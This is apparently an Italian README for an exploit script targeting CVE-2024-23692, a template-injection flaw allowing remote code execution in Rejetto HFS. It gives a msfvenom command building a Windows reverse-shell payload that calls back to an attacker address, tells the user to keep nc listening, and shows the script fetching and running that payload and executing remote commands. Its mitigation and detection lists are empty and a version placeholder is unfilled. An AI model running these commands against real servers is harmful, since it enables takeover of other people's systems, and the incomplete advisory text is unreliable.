
Rejetto HFS (HTTP File Server) è un semplice server web di file che facilita la condivisione di file su una rete o su internet.
Rejetto HFS (HTTP File Server) è un semplice server web per la condivisione di file che facilita la condivisione di file su una rete o su Internet. Nonostante la sua facilità d'uso e semplicità, è stata scoperta una vulnerabilità critica (CVE-2024-23692) che rende il server un bersaglio per gli aggressori.
CVE-2024-23692 è una vulnerabilità di Server-Side Template Injection (SSTI) identificata in Rejetto HFS. Questa vulnerabilità consente a un aggressore di iniettare ed eseguire template dannosi sul server. Se sfruttata, può portare all'esecuzione remota di codice, compromettendo potenzialmente l'intero server e i dati in esso ospitati.
Un aggressore che sfrutta questa vulnerabilità può:
Ottieni una shell utilizzando un binario malevolo creato in msfvenom.
Nota: Lascia nc in ascolto.
# $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.128 LPORT=1234 -f exe > exploit.exe
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 //192.168.198.128/kali/exploit.exe
![[Screenshot_1.png]](https://github.com/Mr-r00t11/CVE-2024-23692/blob/main/img/Screenshot_1.png)
Esegui un comando in remoto.
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 systeminfo
Potrebbero essere necessari circa 15 secondi per visualizzare il risultato.
![[Screenshot_2.png]](https://github.com/Mr-r00t11/CVE-2024-23692/blob/main/img/Screenshot_2.png)
Tutte le versioni di Rejetto HFS fino alla versione [inserire qui l'ultima versione vulnerabile] sono affette da questa vulnerabilità.
Per mitigare il rischio posto da CVE-2024-23692, si consiglia agli utenti di:
Per determinare se il server è stato compromesso, cercare:
Per ulteriore assistenza e supporto, fare riferimento ai forum della comunità di Rejetto HFS o ai canali di supporto ufficiali.
Questo progetto è concesso in licenza con la licenza MIT - vedere il file LICENSE per i dettagli.